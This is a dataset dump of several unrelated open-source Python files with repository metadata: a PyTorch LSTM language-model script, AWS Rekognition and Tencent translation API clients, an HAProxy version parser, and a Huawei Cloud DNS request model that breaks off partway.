# model = torch.nn.DataParallel(model.RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied),
# dim=1)
model = RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied)
if args.cuda:
model.cuda()
# Loop over epochs.
lr = args.lr
best_val_loss = None
try:
for epoch in range(1, args.epochs+1):
epoch_start_time = time.time()
train()
val_loss = evaluate_perplexity(val_data)
logging.info('-' * 89)
logging.info('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '
'valid ppl {:8.2f}'.format(epoch, (time.time() - epoch_start_time),
val_loss, math.exp(val_loss)))
logging.info('-' * 89)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
with open(args.save, 'wb') as f:
torch.save(model, f)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
lr /= 4.0
except KeyboardInterrupt:
logging.info('-' * 89)
logging.info('Exiting from training early')
# Load the best saved model.
with open(args.save, 'rb', encoding="utf8") as f:
model = torch.load(f)
# Run on valid data with OOV excluded
test_loss = evaluate_perplexity(val_data, exclude_oov=True)
logging.info('=' * 89)
logging.info('| End of training | test loss {:5.2f} | test ppl {:8.2f}'.format(test_loss, math.exp(test_loss)))
logging.info('=' * 89)
#####################################
# Testing #
#####################################
if args.test:
dictionary = Dictionary(args.data)
with open(args.save, 'rb', encoding="utf8") as f:
print("Loading the model")
if args.cuda:
model = torch.load(f)
model.cuda()
else:
# to convert model trained on cuda to cpu model
model = torch.load(f, map_location=lambda storage, loc: storage)
model.cpu()
model.eval()
eval_batch_size = 1
ntokens = len(dictionary)
#print("Vocab size", ntokens)
#print("TESTING")
# depends on generation script (constantly modified) - the column where the target word index is written
index_col = 3
mask = create_target_mask(args.test_path + ".text", args.test_path + ".gold", index_col)
mask_data = batchify(torch.LongTensor(mask), eval_batch_size, False)
test_data = batchify(tokenize(dictionary, args.test_path + ".text"), eval_batch_size, args.cuda)
f_output = open(args.test_path + ".output_" + args.suffix, 'w')
evaluate_on_mask(test_data, mask_data)
f_output.close()
| 36.284553 | 135 | 0.596609 | # Copyright (c) 2018-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import argparse
import logging
import math
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from dictionary_corpus import Corpus, Dictionary, tokenize
from utils import batchify
import lm_argparser
parser = argparse.ArgumentParser(parents=[lm_argparser.lm_parser],
description="Training and testing ngram LSTM model")
parser.add_argument('--train', action='store_true', default=False,
help='enable training regime')
parser.add_argument('--test', action='store_true', default=False,
help='enable testing regime')
parser.add_argument('--test_path', type=str,
help='path to test file, gold file and vocab file output')
parser.add_argument('--suffix', type=str,
help='suffix for generated output files which will be saved as path.output_suffix')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO, handlers=[logging.StreamHandler(),
logging.FileHandler(args.log)])
logging.info(args)
class RNNModel(nn.Module):
"""Container module with an encoder, a recurrent module, and a decoder.
ntoken: vocab size
nip: embedding size
"""
def __init__(self, rnn_type, ntoken, ninp, nhid, nlayers, dropout=0.5, tie_weights=False):
super(RNNModel, self).__init__()
self.drop = nn.Dropout(dropout)
self.encoder = nn.Embedding(ntoken, ninp)
if rnn_type in ['LSTM', 'GRU']:
self.rnn = getattr(nn, rnn_type)(ninp, nhid, nlayers, dropout=dropout)
else:
try:
nonlinearity = {'RNN_TANH': 'tanh', 'RNN_RELU': 'relu'}[rnn_type]
except KeyError:
raise ValueError( """An invalid option for `--model` was supplied,
options are ['LSTM', 'GRU', 'RNN_TANH' or 'RNN_RELU']""")
self.rnn = nn.RNN(ninp, nhid, nlayers, nonlinearity=nonlinearity, dropout=dropout)
self.decoder = nn.Linear(nhid, ntoken)
# Optionally tie weights as in:
# "Using the Output Embedding to Improve Language Models" (Press & Wolf 2016)
# https://arxiv.org/abs/1608.05859
# and
# "Tying Word Vectors and Word Classifiers: A Loss Framework for Language Modeling" (Inan et al. 2016)
# https://arxiv.org/abs/1611.01462
if tie_weights:
if nhid != ninp:
raise ValueError('When using the tied flag, nhid must be equal to emsize')
self.decoder.weight = self.encoder.weight
self.init_weights()
self.rnn_type = rnn_type
self.nhid = nhid
self.nlayers = nlayers
def init_weights(self):
initrange = 0.1
self.encoder.weight.data.uniform_(-initrange, initrange)
self.decoder.bias.data.fill_(0)
self.decoder.weight.data.uniform_(-initrange, initrange)
def forward(self, input, hidden):
emb = self.drop(self.encoder(input))
output, hidden = self.rnn(emb, hidden)
#print("hidden", hidden, hidden[0].size())
# take last output of the sequence
output = output[-1]
#print(output)
#decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
#print(output.size())
decoded = self.decoder(output.view(-1, output.size(1)))
#print(output.view(output.size(0)*output.size(1), output.size(2)))
#print(decoded)
return decoded
def init_hidden(self, bsz):
weight = next(self.parameters()).data
if self.rnn_type == 'LSTM':
return (weight.new(self.nlayers, bsz, self.nhid).zero_(),
weight.new(self.nlayers, bsz, self.nhid).zero_())
else:
return weight.new(self.nlayers, bsz, self.nhid).zero_()
def get_batch(source, i, seq_length):
seq_len = min(seq_length, len(source) - 1 - i)
#print("Sequence length", seq_len)
#print(source)
data = source[i:i+seq_len]
#print(data)
#> predict the sequences shifted by one word
target = source[i+seq_len].view(-1)
#print(target)
return data, target
def create_target_mask(test_file, gold_file, index_col):
sents = open(test_file, "r", encoding="utf8").readlines()
golds = open(gold_file, "r", encoding="utf8").readlines()
#TODO optimize by initializaing np.array of needed size and doing indexing
targets = []
for sent, gold in zip(sents, golds):
# constr_id, sent_id, word_id, pos, morph
target_idx = int(gold.split()[index_col])
len_s = len(sent.split(" "))
t_s = [0] * len_s
t_s[target_idx] = 1
#print(sent.split(" ")[target_idx])
targets.extend(t_s)
return np.array(targets)
def evaluate_perplexity(data_source, exclude_oov=False):
# Turn on evaluation mode which disables dropout.
model.eval()
total_loss = 0
ntokens = len(corpus.dictionary)
len_data = 0
unk_idx = corpus.dictionary.word2idx["<unk>"]
if args.cuda:
torch_range = torch.cuda.LongTensor()
else:
torch_range = torch.LongTensor()
with torch.no_grad():
for i in range(0, data_source.size(0) - 1):
hidden = model.init_hidden(eval_batch_size)
data, targets = get_batch(data_source, i, args.bptt)
#> output has size seq_length x batch_size x vocab_size
output = model(data, hidden)
output_flat = output.view(-1, ntokens)
# excluding OOV
if exclude_oov:
subset = targets != unk_idx
subset = subset.data
targets = targets[subset]
output_flat = output_flat[torch.arange(0, output_flat.size(0), out=torch_range)[subset]]
total_loss += targets.size(0) * nn.CrossEntropyLoss()(output_flat, targets).data
len_data += targets.size(0)
return total_loss[0] / len_data
def evaluate_on_mask(data_source, mask):
model.eval()
idx2word = dictionary.idx2word
for i in range(0, data_source.size(0) - 1):
hidden = model.init_hidden(eval_batch_size)
data, targets = get_batch(data_source, i, args.bptt, evaluation=True)
_, targets_mask = get_batch(mask, i, args.bptt, evaluation=True)
#print(targets_mask.size())
#> output has size seq_length x batch_size x vocab_size
output = model(data, hidden)
output_flat = output.view(-1, ntokens)
log_probs = F.log_softmax(output_flat)
# print("Log probs size", log_probs.size())
# print("Target size", targets.size())
log_probs_np = log_probs.data.cpu().numpy()
subset = targets_mask.data.numpy().astype(bool)
for scores, correct_label in zip(log_probs_np[subset], targets.data.cpu().numpy()[subset]):
print(idx2word[correct_label], scores[correct_label])
f_output.write("\t".join(str(s) for s in scores) + "\n")
#return total_loss[0] /len(data_source)
###############################################################################
# Training code
###############################################################################
def train():
# Turn on training mode which enables dropout.
model.train()
total_loss = 0
start_time = time.time()
criterion = nn.CrossEntropyLoss()
for batch, i in enumerate(range(0, train_data.size(0) - 1)):
#> i is the starting index of the batch
#> batch is the number of the batch
#> data is a tensor of size seq_length x batch_size, where each element is an index from input vocabulary
#> targets is a vector of length seq_length x batch_size
data, targets = get_batch(train_data, i, args.bptt)
hidden = model.init_hidden(args.batch_size)
model.zero_grad()
output = model(data, hidden)
#> output.view(-1, ntokens) transforms a tensor to a longer tensor of size
#> (seq_length x batch_size) x output_vocab_size
#> which matches targets in length
loss = criterion(output.view(-1, ntokens), targets)
loss.backward()
torch.nn.utils.clip_grad_norm(model.parameters(), args.clip)
for p in model.parameters():
p.data.add_(-lr, p.grad.data)
total_loss += loss.data
if batch % args.log_interval == 0 and batch > 0:
cur_loss = total_loss[0] / args.log_interval
elapsed = time.time() - start_time
#logging.info('| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2f} | ms/batch {:5.2f} | '
# 'loss {:5.2f} | ppl {:8.2f}'.format(
# epoch, batch, len(train_data) // args.bptt, lr,
# elapsed * 1000 / args.log_interval, cur_loss, math.exp(cur_loss)))
logging.info('| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2f} | ms/batch {:5.2f} | '
'loss {:5.2f}'.format(epoch, batch, len(train_data), lr,
elapsed * 1000 / args.log_interval, cur_loss))
total_loss = 0
start_time = time.time()
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
else:
torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
if args.train:
logging.info("Loading data")
corpus = Corpus(args.data)
# logging.info(corpus.train)
ntokens = len(corpus.dictionary)
logging.info("Vocab size %d", ntokens)
logging.info("Batchying..")
eval_batch_size = 256
train_data = batchify(corpus.train, args.batch_size, args.cuda)
# logging.info("Train data size", train_data.size())
val_data = batchify(corpus.valid, eval_batch_size, args.cuda)
test_data = batchify(corpus.test, eval_batch_size, args.cuda)
logging.info("Building the model")
# model = torch.nn.DataParallel(model.RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied),
# dim=1)
model = RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied)
if args.cuda:
model.cuda()
# Loop over epochs.
lr = args.lr
best_val_loss = None
try:
for epoch in range(1, args.epochs+1):
epoch_start_time = time.time()
train()
val_loss = evaluate_perplexity(val_data)
logging.info('-' * 89)
logging.info('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '
'valid ppl {:8.2f}'.format(epoch, (time.time() - epoch_start_time),
val_loss, math.exp(val_loss)))
logging.info('-' * 89)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
with open(args.save, 'wb') as f:
torch.save(model, f)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
lr /= 4.0
except KeyboardInterrupt:
logging.info('-' * 89)
logging.info('Exiting from training early')
# Load the best saved model.
with open(args.save, 'rb', encoding="utf8") as f:
model = torch.load(f)
# Run on valid data with OOV excluded
test_loss = evaluate_perplexity(val_data, exclude_oov=True)
logging.info('=' * 89)
logging.info('| End of training | test loss {:5.2f} | test ppl {:8.2f}'.format(test_loss, math.exp(test_loss)))
logging.info('=' * 89)
#####################################
# Testing #
#####################################
if args.test:
dictionary = Dictionary(args.data)
with open(args.save, 'rb', encoding="utf8") as f:
print("Loading the model")
if args.cuda:
model = torch.load(f)
model.cuda()
else:
# to convert model trained on cuda to cpu model
model = torch.load(f, map_location=lambda storage, loc: storage)
model.cpu()
model.eval()
eval_batch_size = 1
ntokens = len(dictionary)
#print("Vocab size", ntokens)
#print("TESTING")
# depends on generation script (constantly modified) - the column where the target word index is written
index_col = 3
mask = create_target_mask(args.test_path + ".text", args.test_path + ".gold", index_col)
mask_data = batchify(torch.LongTensor(mask), eval_batch_size, False)
test_data = batchify(tokenize(dictionary, args.test_path + ".text"), eval_batch_size, args.cuda)
f_output = open(args.test_path + ".output_" + args.suffix, 'w')
evaluate_on_mask(test_data, mask_data)
f_output.close()
| 7,509 | 0 | 223 |
c27598268e1d0e6a50e5d396fd0a67b3c383e1b3 | 901 | py | Python | part7/pi/RekognitionApi.py | sofiaisha/johnnypi | e4bdeca9f1741c7d387557d907879633f2fbf8ed | [
"Apache-2.0"
] | null | null | null | part7/pi/RekognitionApi.py | sofiaisha/johnnypi | e4bdeca9f1741c7d387557d907879633f2fbf8ed | [
"Apache-2.0"
] | null | null | null | part7/pi/RekognitionApi.py | sofiaisha/johnnypi | e4bdeca9f1741c7d387557d907879633f2fbf8ed | [
"Apache-2.0"
] | null | null | null | import boto3
defaultRegion = 'eu-west-1'
defaultUrl = 'https://rekognition.'+defaultRegion+'.amazonaws.com'
defaultBucket = "jsimon-public"
| 42.904762 | 104 | 0.732519 | import boto3
defaultRegion = 'eu-west-1'
defaultUrl = 'https://rekognition.'+defaultRegion+'.amazonaws.com'
defaultBucket = "jsimon-public"
def connectToRekognition(regionName=defaultRegion, endpointUrl=defaultUrl):
return boto3.client('rekognition', region_name=regionName, endpoint_url=endpointUrl)
def detectFaces(rekognition, imageFilename, imageBucket=defaultBucket, attributes='ALL'):
resp = rekognition.detect_faces(
Image = {"S3Object" : {'Bucket' : imageBucket, 'Name' : imageFilename}},
Attributes=[attributes])
return resp['FaceDetails']
def detectLabels(rekognition, imageFilename, imageBucket=defaultBucket, maxLabels=10, minConfidence=80):
resp = rekognition.detect_labels(
Image = {"S3Object" : {'Bucket' : imageBucket, 'Name' : imageFilename}},
MaxLabels = maxLabels, MinConfidence = minConfidence)
return resp['Labels']
| 691 | 0 | 69 |
660cbf8a629f9279a5e8400f39b722641b3bf4fa | 512 | py | Python | haproxy/datadog_checks/haproxy/legacy/version_utils.py | mchelen-gov/integrations-core | 81281600b3cc7025a7a32148c59620c9592a564f | [
"BSD-3-Clause"
] | 663 | 2016-08-23T05:23:45.000Z | 2022-03-29T00:37:23.000Z | haproxy/datadog_checks/haproxy/legacy/version_utils.py | mchelen-gov/integrations-core | 81281600b3cc7025a7a32148c59620c9592a564f | [
"BSD-3-Clause"
] | 6,642 | 2016-06-09T16:29:20.000Z | 2022-03-31T22:24:09.000Z | haproxy/datadog_checks/haproxy/legacy/version_utils.py | mchelen-gov/integrations-core | 81281600b3cc7025a7a32148c59620c9592a564f | [
"BSD-3-Clause"
] | 1,222 | 2017-01-27T15:51:38.000Z | 2022-03-31T18:17:51.000Z | # (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import re
VERSION_PATTERN = re.compile(r"(?:HAProxy|hapee-lb) version ([^,]+)")
| 23.272727 | 69 | 0.646484 | # (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import re
VERSION_PATTERN = re.compile(r"(?:HAProxy|hapee-lb) version ([^,]+)")
def get_version_from_http(raw_version):
if raw_version == "":
return None
else:
return VERSION_PATTERN.search(raw_version).group(1)
def get_version_from_socket(info):
for line in info:
key, value = line.split(':')
if key == 'Version':
return value
return ''
| 274 | 0 | 46 |
9246f3b991651372f43f7eb0a28fb084c553f61f | 2,960 | py | Python | frameworks/tencent_translate/entrypoint.py | OpenNMT/nmt-wizard-docker | a7f44297168fa0ac5159dbc7c9d49c1badaff7d5 | [
"MIT"
] | 44 | 2018-03-07T13:29:08.000Z | 2022-02-17T08:09:01.000Z | frameworks/tencent_translate/entrypoint.py | OpenNMT/nmt-wizard-docker | a7f44297168fa0ac5159dbc7c9d49c1badaff7d5 | [
"MIT"
] | 73 | 2018-03-07T11:06:38.000Z | 2022-01-06T14:31:31.000Z | frameworks/tencent_translate/entrypoint.py | OpenNMT/nmt-wizard-docker | a7f44297168fa0ac5159dbc7c9d49c1badaff7d5 | [
"MIT"
] | 20 | 2018-03-06T23:38:26.000Z | 2022-02-15T10:16:06.000Z | import os
import time
import hashlib
import hmac
import base64
import random
import sys
import binascii
import requests
import urllib.parse
from nmtwizard.cloud_translation_framework import CloudTranslationFramework
if __name__ == "__main__":
TencentTranslateFramework().run()
| 29.6 | 82 | 0.576351 | import os
import time
import hashlib
import hmac
import base64
import random
import sys
import binascii
import requests
import urllib.parse
from nmtwizard.cloud_translation_framework import CloudTranslationFramework
class TencentTranslateFramework(CloudTranslationFramework):
def __init__(self):
super(TencentTranslateFramework, self).__init__()
self._appid = os.getenv("TENCENT_SecretId")
self._key = os.getenv("TENCENT_SecretKey")
if self._appid is None:
raise ValueError("missing app id")
if self._key is None:
raise ValueError("missing key")
def translate_batch(self, batch, source_lang, target_lang):
# Tencent API does not support translating multi lines in one request
for line in batch:
yield self._translate_line(line, source_lang, target_lang)
def _translate_line(self, line, source_lang, target_lang):
url = "tmt.na-siliconvalley.tencentcloudapi.com"
signature_method = "HmacSHA256"
params = [
("Action", "TextTranslate"),
("Nonce", random.randint(1, sys.maxsize)),
("ProjectId", 0),
("Region", "na-siliconvalley"),
("SecretId", self._appid),
("SignatureMethod", signature_method),
("Source", source_lang.lower()),
("SourceText", line),
("Target", target_lang.lower()),
("Timestamp", int(time.time())),
("Version", "2018-03-21"),
]
request = "GET%s/?%s" % (url, urllib.parse.urlencode(params))
params.append(
("Signature", _sign_request(self._key, request, signature_method))
)
headers = {
"content-type": "application/x-www-form-urlencoded",
"accept": "application/json",
}
result = self.send_request(
lambda: requests.get("https://" + url, params=params, headers=headers)
)
return result["Response"]["TargetText"]
def supported_languages(self):
return [
"de",
"en",
"es",
"fr",
"id",
"it",
"ja",
"ko",
"ms",
"pt",
"ru",
"th",
"tr",
"vi",
"zh",
]
def _sign_request(secretKey, signStr, signMethod):
signStr = bytes(signStr, "utf-8")
secretKey = bytes(secretKey, "utf-8")
digestmod = None
if signMethod == "HmacSHA256":
digestmod = hashlib.sha256
elif signMethod == "HmacSHA1":
digestmod = hashlib.sha1
else:
raise NotImplementedError(
"signMethod invalid", "signMethod only support (HmacSHA1, HmacSHA256)"
)
hashed = hmac.new(secretKey, signStr, digestmod)
return binascii.b2a_base64(hashed.digest())[:-1].decode()
if __name__ == "__main__":
TencentTranslateFramework().run()
| 2,483 | 38 | 153 |
2ab023dd348797c93d60e6e16feda87daf60e9b5 | 13,858 | py | Python | huaweicloud-sdk-dns/huaweicloudsdkdns/v2/model/list_record_sets_with_line_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | 1 | 2021-11-03T07:54:50.000Z | 2021-11-03T07:54:50.000Z | huaweicloud-sdk-dns/huaweicloudsdkdns/v2/model/list_record_sets_with_line_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-dns/huaweicloudsdkdns/v2/model/list_record_sets_with_line_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
import pprint
import re
import six
class ListRecordSetsWithLineRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'zone_type': 'str',
'marker': 'str',
'limit': 'str',
'offset': 'str',
'line_id': 'str',
'tags': 'str',
'status': 'str',
'type': 'str',
'name': 'str',
'id': 'str',
'records': 'str',
'sort_key': 'str',
'sort_dir': 'str',
'health_check_id': 'str',
'search_mode': 'str'
}
attribute_map = {
'zone_type': 'zone_type',
'marker': 'marker',
'limit': 'limit',
'offset': 'offset',
'line_id': 'line_id',
'tags': 'tags',
'status': 'status',
'type': 'type',
'name': 'name',
'id': 'id',
'records': 'records',
'sort_key': 'sort_key',
'sort_dir': 'sort_dir',
'health_check_id': 'health_check_id',
'search_mode': 'search_mode'
}
def __init__(self, zone_type=None, marker=None, limit=None, offset=None, line_id=None, tags=None, status=None, type=None, name=None, id=None, records=None, sort_key=None, sort_dir=None, health_check_id=None, search_mode=None):
"""ListRecordSetsWithLineRequest - a model defined in huaweicloud sdk"""
self._zone_type = None
self._marker = None
self._limit = None
self._offset = None
self._line_id = None
self._tags = None
self._status = None
self._type = None
self._name = None
self._id = None
self._records = None
self._sort_key = None
self._sort_dir = None
self._health_check_id = None
self._search_mode = None
self.discriminator = None
if zone_type is not None:
self.zone_type = zone_type
if marker is not None:
self.marker = marker
if limit is not None:
self.limit = limit
if offset is not None:
self.offset = offset
if line_id is not None:
self.line_id = line_id
if tags is not None:
self.tags = tags
if status is not None:
self.status = status
if type is not None:
self.type = type
if name is not None:
self.name = name
if id is not None:
self.id = id
if records is not None:
self.records = records
if sort_key is not None:
self.sort_key = sort_key
if sort_dir is not None:
self.sort_dir = sort_dir
if health_check_id is not None:
self.health_check_id = health_check_id
if search_mode is not None:
self.search_mode = search_mode
@property
def zone_type(self):
"""Gets the zone_type of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名类型。 取值范围:public 搜索模式默认为模糊搜索。 默认值为public。
:return: The zone_type of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._zone_type
@zone_type.setter
def zone_type(self, zone_type):
"""Sets the zone_type of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名类型。 取值范围:public 搜索模式默认为模糊搜索。 默认值为public。
:param zone_type: The zone_type of this ListRecordSetsWithLineRequest.
:type: str
"""
self._zone_type = zone_type
@property
def marker(self):
"""Gets the marker of this ListRecordSetsWithLineRequest.
分页查询起始的资源ID,为空时为查询第一页。 默认值为空。
:return: The marker of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._marker
@marker.setter
def marker(self, marker):
"""Sets the marker of this ListRecordSetsWithLineRequest.
分页查询起始的资源ID,为空时为查询第一页。 默认值为空。
:param marker: The marker of this ListRecordSetsWithLineRequest.
:type: str
"""
self._marker = marker
@property
def limit(self):
"""Gets the limit of this ListRecordSetsWithLineRequest.
每页返回的资源个数。 取值范围:0~500 取值一般为10,20,50。默认值为500。
:return: The limit of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this ListRecordSetsWithLineRequest.
每页返回的资源个数。 取值范围:0~500 取值一般为10,20,50。默认值为500。
:param limit: The limit of this ListRecordSetsWithLineRequest.
:type: str
"""
self._limit = limit
@property
def offset(self):
"""Gets the offset of this ListRecordSetsWithLineRequest.
分页查询起始偏移量,表示从偏移量的下一个资源开始查询。 取值范围:0~2147483647 默认值为0。 当前设置marker不为空时,以marker为分页起始标识。
:return: The offset of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this ListRecordSetsWithLineRequest.
分页查询起始偏移量,表示从偏移量的下一个资源开始查询。 取值范围:0~2147483647 默认值为0。 当前设置marker不为空时,以marker为分页起始标识。
:param offset: The offset of this ListRecordSetsWithLineRequest.
:type: str
"""
self._offset = offset
@property
def line_id(self):
"""Gets the line_id of this ListRecordSetsWithLineRequest.
解析线路ID。
:return: The line_id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._line_id
@line_id.setter
def line_id(self, line_id):
"""Sets the line_id of this ListRecordSetsWithLineRequest.
解析线路ID。
:param line_id: The line_id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._line_id = line_id
@property
def tags(self):
"""Gets the tags of this ListRecordSetsWithLineRequest.
资源标签。 取值格式:key1,value1|key2,value2 多个标签之间用\"|\"分开,每个标签的键值用英文逗号\",\"相隔。
:return: The tags of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._tags
@tags.setter
def tags(self, tags):
"""Sets the tags of this ListRecordSetsWithLineRequest.
资源标签。 取值格式:key1,value1|key2,value2 多个标签之间用\"|\"分开,每个标签的键值用英文逗号\",\"相隔。
:param tags: The tags of this ListRecordSetsWithLineRequest.
:type: str
"""
self._tags = tags
@property
def status(self):
"""Gets the status of this ListRecordSetsWithLineRequest.
待查询的Record Set的状态。 取值范围:ACTIVE、ERROR、DISABLE、FREEZE、PENDING_CREATE、PENDING_UPDATE、PENDING_DELETE
:return: The status of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this ListRecordSetsWithLineRequest.
待查询的Record Set的状态。 取值范围:ACTIVE、ERROR、DISABLE、FREEZE、PENDING_CREATE、PENDING_UPDATE、PENDING_DELETE
:param status: The status of this ListRecordSetsWithLineRequest.
:type: str
"""
self._status = status
@property
def type(self):
"""Gets the type of this ListRecordSetsWithLineRequest.
待查询的Record Set的记录集类型。 取值范围:A、CNAME、MX、AAAA、TXT、SRV、NS、CAA
:return: The type of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ListRecordSetsWithLineRequest.
待查询的Record Set的记录集类型。 取值范围:A、CNAME、MX、AAAA、TXT、SRV、NS、CAA
:param type: The type of this ListRecordSetsWithLineRequest.
:type: str
"""
self._type = type
@property
def name(self):
"""Gets the name of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名中包含此name。 搜索模式默认为模糊搜索。 默认值为空。
:return: The name of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名中包含此name。 搜索模式默认为模糊搜索。 默认值为空。
:param name: The name of this ListRecordSetsWithLineRequest.
:type: str
"""
self._name = name
@property
def id(self):
"""Gets the id of this ListRecordSetsWithLineRequest.
待查询的Record Set的id包含此id。 搜索模式默认为模糊搜索。 默认值为空。
:return: The id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ListRecordSetsWithLineRequest.
待查询的Record Set的id包含此id。 搜索模式默认为模糊搜索。 默认值为空。
:param id: The id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._id = id
@property
def records(self):
"""Gets the records of this ListRecordSetsWithLineRequest.
待查询的Record Set的值中包含此records。 搜索模式默认为模糊搜索。 默认值为空。
:return: The records of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._records
@records.setter
def records(self, records):
"""Sets the records of this ListRecordSetsWithLineRequest.
待查询的Record Set的值中包含此records。 搜索模式默认为模糊搜索。 默认值为空。
:param records: The records of this ListRecordSetsWithLineRequest.
:type: str
"""
self._records = records
@property
def sort_key(self):
"""Gets the sort_key of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序字段。 取值范围: name:域名 type:记录集类型 默认值为空,表示不排序。
:return: The sort_key of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._sort_key
@sort_key.setter
def sort_key(self, sort_key):
"""Sets the sort_key of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序字段。 取值范围: name:域名 type:记录集类型 默认值为空,表示不排序。
:param sort_key: The sort_key of this ListRecordSetsWithLineRequest.
:type: str
"""
self._sort_key = sort_key
@property
def sort_dir(self):
"""Gets the sort_dir of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序方式。 取值范围: desc:降序排序 asc:升序排序 默认值为空,表示不排序。
:return: The sort_dir of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._sort_dir
@sort_dir.setter
def sort_dir(self, sort_dir):
"""Sets the sort_dir of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序方式。 取值范围: desc:降序排序 asc:升序排序 默认值为空,表示不排序。
:param sort_dir: The sort_dir of this ListRecordSetsWithLineRequest.
:type: str
"""
self._sort_dir = sort_dir
@property
def health_check_id(self):
"""Gets the health_check_id of this ListRecordSetsWithLineRequest.
健康检查ID。 搜索模式默认为模糊搜索。 默认值为空。
:return: The health_check_id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._health_check_id
@health_check_id.setter
def health_check_id(self, health_check_id):
"""Sets the health_check_id of this ListRecordSetsWithLineRequest.
健康检查ID。 搜索模式默认为模糊搜索。 默认值为空。
:param health_check_id: The health_check_id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._health_check_id = health_check_id
@property
def search_mode(self):
"""Gets the search_mode of this ListRecordSetsWithLineRequest.
查询条件搜索模式。 取值范围: like:模糊搜索 equal:精确搜索 默认值为like。
:return: The search_mode of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._search_mode
@search_mode.setter
def search_mode(self, search_mode):
"""Sets the search_mode of this ListRecordSetsWithLineRequest.
查询条件搜索模式。 取值范围: like:模糊搜索 equal:精确搜索 默认值为like。
:param search_mode: The search_mode of this ListRecordSetsWithLineRequest.
:type: str
"""
self._search_mode = search_mode
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListRecordSetsWithLineRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 28.339468 | 230 | 0.603262 | # coding: utf-8
import pprint
import re
import six
class ListRecordSetsWithLineRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'zone_type': 'str',
'marker': 'str',
'limit': 'str',
'offset': 'str',
'line_id': 'str',
'tags': 'str',
'status': 'str',
'type': 'str',
'name': 'str',
'id': 'str',
'records': 'str',
'sort_key': 'str',
